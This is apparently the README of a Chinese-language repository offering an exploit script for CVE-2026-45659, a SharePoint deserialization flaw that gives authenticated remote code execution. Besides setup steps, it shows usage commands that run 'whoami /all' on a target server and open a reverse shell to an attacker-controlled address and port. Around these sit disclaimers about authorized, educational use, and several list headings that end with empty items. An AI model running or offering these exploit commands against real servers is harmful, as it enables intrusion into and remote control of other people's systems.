Microsoft Office SharePoint 中未受信任数据的反序列化允许经授权的攻击者通过网络执行代码。
仅在安全且获得授权的环境中使用本项目,例如:
示例设置:
git clone <repository-url>
cd <repository-name>
示例用法:
# 安装依赖
pip install -r requirements.txt
# 基本命令执行
python cve-2026-45659.py -t http://sp.lab.local -u lab\\testuser -p Password123 -l "Documents" -c "whoami /all"
# 反向Shell
python cve-2026-45659.py -t http://sp.lab.local -u lab\\testuser -p Password123 -l "Documents" --reverse --ip 192.168.1.100 --port 4444
一个用于在受控环境中学习、测试和研究网络安全概念的仓库。
本仓库仅用于教育和授权的安全研究。
旨在帮助用户了解:
仅在你拥有权限的环境中使用本仓库,例如:
严禁未经授权或非法使用。
作者及贡献者不对因本项目造成的任何损害、滥用、法律问题或损失承担责任。
使用本仓库即表示你同意:
本项目旨在用于:
请遵循负责任的披露实践,并遵守所有适用法律。
如需负责任的披露或合作,请通过 GitHub 联系仓库维护者。